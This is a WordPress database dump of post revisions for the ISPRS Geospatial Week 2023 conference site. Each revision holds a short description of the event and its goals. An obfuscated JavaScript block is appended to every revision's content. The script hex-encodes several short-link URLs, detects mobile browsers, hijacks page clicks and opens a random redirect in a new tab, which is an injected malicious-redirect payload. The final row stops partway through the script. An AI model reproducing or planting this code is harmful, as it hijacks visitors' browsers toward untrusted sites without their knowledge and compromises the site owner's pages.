(3765,1,'2023-02-04 07:04:10','2023-02-04 07:04:10','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\n<h5 style=\"text-align: justify; color: red;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></h5>\n<h5 class=\"gap-10\"></h5>\n<ul class=\"nospace\">\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong>Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</strong></span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong>Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</strong></span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong>Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</strong></span></p>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2023-02-04 07:04:10','2023-02-04 07:04:10','',2631,'https://gsw2023.com/?p=3765',0,'revision','',0),
(3766,1,'2023-02-04 07:04:41','2023-02-04 07:04:41','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\r\n<h5 style=\"text-align: justify; color: red;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></h5>\r\n<h5 class=\"gap-10\"></h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</strong></h5>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2023-02-04 07:04:41','2023-02-04 07:04:41','',2631,'https://gsw2023.com/?p=3766',0,'revision','',0),
(3767,1,'2023-02-04 07:05:35','2023-02-04 07:05:35','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\n<h5 style=\"text-align: justify; color: black;\"><strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\n<h5 style=\"text-align: justify; color: red;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></h5>\n<h5 class=\"gap-10\"></h5>\n<ul class=\"nospace\">\n 	<li>\n<h5 style=\"text-align: justify; color: black;\"><strong>Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</strong></h5>\n</li>\n 	<li>\n<h5 style=\"text-align: justify; color: black;\"><strong>Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</strong></h5>\n</li>\n 	<li>\n<h5 style=\"text-align: justify; color: black;\"><strong>Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</strong></h5>\n</li>\n</ul>\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\